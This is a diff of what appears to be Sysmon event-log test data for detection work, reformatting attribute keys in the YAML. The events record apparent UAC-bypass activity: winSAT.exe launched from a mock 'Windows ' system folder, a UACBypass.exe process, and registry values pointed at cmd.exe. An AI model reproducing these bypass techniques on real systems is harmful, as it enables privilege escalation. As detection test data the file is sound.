@@ -1639,30 +1473,26 @@ Event: Correlation: ~ EventID: 11 EventRecordID: 4726 - Execution: - "#attributes": - ProcessID: 2748 - ThreadID: 3376 + Execution_attributes: + ProcessID: 2748 + ThreadID: 3376 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 11 - TimeCreated: - "#attributes": - SystemTime: "2019-07-27T22:43:41.757216Z" + TimeCreated_attributes: + SystemTime: "2019-07-27T22:43:41.757216Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: CommandLine: "\"C:\\Windows \\System32\\winSAT.exe\" formal" Company: Microsoft Corporation 
@@ -1691,30 +1521,26 @@ Event: Correlation: ~ EventID: 1 EventRecordID: 4727 - Execution: - "#attributes": - ProcessID: 2748 - ThreadID: 3376 + Execution_attributes: + ProcessID: 2748 + ThreadID: 3376 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 1 - TimeCreated: - "#attributes": - SystemTime: "2019-07-27T22:43:42.033042Z" + TimeCreated_attributes: + SystemTime: "2019-07-27T22:43:42.033042Z" Version: 5 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: CallTrace: "C:\\Windows\\SYSTEM32\\ntdll.dll+a0fb4|C:\\Windows\\System32\\KERNELBASE.dll+47241|C:\\Windows\\System32\\KERNELBASE.dll+46196|C:\\Windows\\System32\\KERNEL32.DLL+1c2e3|C:\\Windows\\System32\\windows.storage.dll+19f330|C:\\Windows\\System32\\windows.storage.dll+14ce7e|C:\\Windows\\System32\\windows.storage.dll+efad8|C:\\Windows\\System32\\windows.storage.dll+ef8b7|C:\\Windows\\System32\\windows.storage.dll+ef51d|C:\\Windows\\System32\\windows.storage.dll+14b0ad|C:\\Windows\\System32\\windows.storage.dll+145da4|C:\\Windows\\System32\\windows.storage.dll+147c7a|C:\\Windows\\System32\\windows.storage.dll+14432d|C:\\Windows\\System32\\windows.storage.dll+144225|C:\\Windows\\System32\\SHELL32.dll+a880f|C:\\Windows\\System32\\SHELL32.dll+a86ca|C:\\Windows\\System32\\SHELL32.dll+484e7|C:\\Windows\\System32\\SHELL32.dll+52549|C:\\Windows\\System32\\SHELL32.dll+a8393|C:\\Windows\\System32\\SHELL32.dll+a826b|C:\\Windows\\System32\\SHELL32.dll+50666|C:\\Windows\\System32\\SHELL32.dll+c2e1e|C:\\Windows\\System32\\shcore.dll+2c315|C:\\Windows\\System32\\KERNEL32.DLL+17974" 
GrantedAccess: "0x1fffff" @@ -1733,30 +1559,26 @@ Event: Correlation: ~ EventID: 10 EventRecordID: 4728 - Execution: - "#attributes": - ProcessID: 2748 - ThreadID: 3376 + Execution_attributes: + ProcessID: 2748 + ThreadID: 3376 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 10 - TimeCreated: - "#attributes": - SystemTime: "2019-07-27T22:43:42.033420Z" + TimeCreated_attributes: + SystemTime: "2019-07-27T22:43:42.033420Z" Version: 3 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: CommandLine: "\"C:\\Windows \\System32\\winSAT.exe\" formal" Company: Microsoft Corporation 
@@ -1785,30 +1607,26 @@ Event: Correlation: ~ EventID: 1 EventRecordID: 4730 - Execution: - "#attributes": - ProcessID: 2748 - ThreadID: 3376 + Execution_attributes: + ProcessID: 2748 + ThreadID: 3376 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 1 - TimeCreated: - "#attributes": - SystemTime: "2019-07-27T22:43:42.392880Z" + TimeCreated_attributes: + SystemTime: "2019-07-27T22:43:42.392880Z" Version: 5 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Image: "C:\\Users\\IEUser\\Downloads\\UACBypass.exe" ProcessGuid: 747F3D96-D39D-5D3C-0000-001026F55500 @@ -1821,30 +1639,26 @@ Event: Correlation: ~ EventID: 5 EventRecordID: 4731 - Execution: - "#attributes": - ProcessID: 2748 - ThreadID: 3376 + Execution_attributes: + ProcessID: 2748 + ThreadID: 3376 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 5 - TimeCreated: - "#attributes": - SystemTime: "2019-07-27T22:43:42.938088Z" + TimeCreated_attributes: + SystemTime: "2019-07-27T22:43:42.938088Z" Version: 3 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Company: "?" Description: "?" 
@@ -1866,30 +1680,26 @@ Event: Correlation: ~ EventID: 7 EventRecordID: 4732 - Execution: - "#attributes": - ProcessID: 2748 - ThreadID: 3384 + Execution_attributes: + ProcessID: 2748 + ThreadID: 3384 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 7 - TimeCreated: - "#attributes": - SystemTime: "2019-07-27T22:43:43.016956Z" + TimeCreated_attributes: + SystemTime: "2019-07-27T22:43:43.016956Z" Version: 3 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: "c:\\Windows\\System32\\cmd.exe" EventType: SetValue @@ -1905,30 +1715,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 112814 - Execution: - "#attributes": - ProcessID: 2888 - ThreadID: 3384 + Execution_attributes: + ProcessID: 2888 + ThreadID: 3384 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2020-05-07T13:13:01.683498Z" + TimeCreated_attributes: + SystemTime: "2020-05-07T13:13:01.683498Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Company: "?" Description: "?" 
@@ -1950,30 +1756,26 @@ Event: Correlation: ~ EventID: 7 EventRecordID: 15882 - Execution: - "#attributes": - ProcessID: 2000 - ThreadID: 1748 + Execution_attributes: + ProcessID: 2000 + ThreadID: 1748 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 7 - TimeCreated: - "#attributes": - SystemTime: "2019-05-11T09:50:27.030880Z" + TimeCreated_attributes: + SystemTime: "2019-05-11T09:50:27.030880Z" Version: 3 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\DNeruK" EventType: SetValue @@ -1989,30 +1791,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 143174 - Execution: - "#attributes": - ProcessID: 2856 - ThreadID: 3608 + Execution_attributes: + ProcessID: 2856 + ThreadID: 3608 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2020-05-12T15:06:49.183867Z" + TimeCreated_attributes: + SystemTime: "2020-05-12T15:06:49.183867Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Company: "?" Description: "?" 
@@ -2034,30 +1832,26 @@ Event: Correlation: ~ EventID: 7 EventRecordID: 15992 - Execution: - "#attributes": - ProcessID: 2008 - ThreadID: 1992 + Execution_attributes: + ProcessID: 2008 + ThreadID: 1992 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 7 - TimeCreated: - "#attributes": - SystemTime: "2019-05-11T16:54:18.069438Z" + TimeCreated_attributes: + SystemTime: "2019-05-11T16:54:18.069438Z" Version: 3 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: CreationUtcTime: "2019-08-03 12:06:53.846" Image: "C:\\Windows\\explorer.exe" @@ -2072,30 +1866,26 @@ Event: Correlation: ~ EventID: 11 EventRecordID: 5429 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 11 - TimeCreated: - "#attributes": - SystemTime: "2019-08-03T12:06:53.933988Z" + TimeCreated_attributes: + SystemTime: "2019-08-03T12:06:53.933988Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: CreationUtcTime: "2019-08-03 12:08:13.721" Image: "C:\\Windows\\explorer.exe" 
@@ -2110,30 +1900,26 @@ Event: Correlation: ~ EventID: 11 EventRecordID: 5438 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 11 - TimeCreated: - "#attributes": - SystemTime: "2019-08-03T12:08:13.818381Z" + TimeCreated_attributes: + SystemTime: "2019-08-03T12:08:13.818381Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: "\"C:\\Windows\\system32\\cmd.exe\"" EventType: SetValue @@ -2149,30 +1935,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 5132 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2019-08-03T09:46:48.726304Z" + TimeCreated_attributes: + SystemTime: "2019-08-03T09:46:48.726304Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: EventType: DeleteValue Image: "C:\\Windows\\explorer.exe" 
@@ -2187,30 +1969,26 @@ Event: Correlation: ~ EventID: 12 EventRecordID: 5135 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 12 - TimeCreated: - "#attributes": - SystemTime: "2019-08-03T09:46:49.436856Z" + TimeCreated_attributes: + SystemTime: "2019-08-03T09:46:49.436856Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: (Empty) EventType: SetValue @@ -2226,30 +2004,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 5272 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2019-08-03T10:14:02.929209Z" + TimeCreated_attributes: + SystemTime: "2019-08-03T10:14:02.929209Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: "C:\\Windows\\system32\\cmd.exe" EventType: SetValue 
@@ -2265,30 +2039,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 5273 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2019-08-03T10:14:02.934826Z" + TimeCreated_attributes: + SystemTime: "2019-08-03T10:14:02.934826Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: EventType: DeleteKey Image: "C:\\Windows\\explorer.exe" @@ -2303,30 +2073,26 @@ Event: Correlation: ~ EventID: 12 EventRecordID: 5278 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 12 - TimeCreated: - "#attributes": - SystemTime: "2019-08-03T10:14:08.681363Z" + TimeCreated_attributes: + SystemTime: "2019-08-03T10:14:08.681363Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: CreationUtcTime: "2019-08-03 10:51:46.599" Image: "C:\\Windows\\explorer.exe" 
@@ -2341,30 +2107,26 @@ Event: Correlation: ~ EventID: 11 EventRecordID: 5305 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 11 - TimeCreated: - "#attributes": - SystemTime: "2019-08-03T10:51:46.647421Z" + TimeCreated_attributes: + SystemTime: "2019-08-03T10:51:46.647421Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: "c:\\Windows\\SysWOW64\\notepad.exe" EventType: SetValue @@ -2380,30 +2142,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 5664 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2019-08-04T08:56:16.650581Z" + TimeCreated_attributes: + SystemTime: "2019-08-04T08:56:16.650581Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: "C:\\Windows\\system32\\cmd.exe" EventType: SetValue 
@@ -2419,23 +2177,21 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 5698 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2019-08-04T09:10:29.060588Z" + TimeCreated_attributes: + SystemTime: "2019-08-04T09:10:29.060588Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event"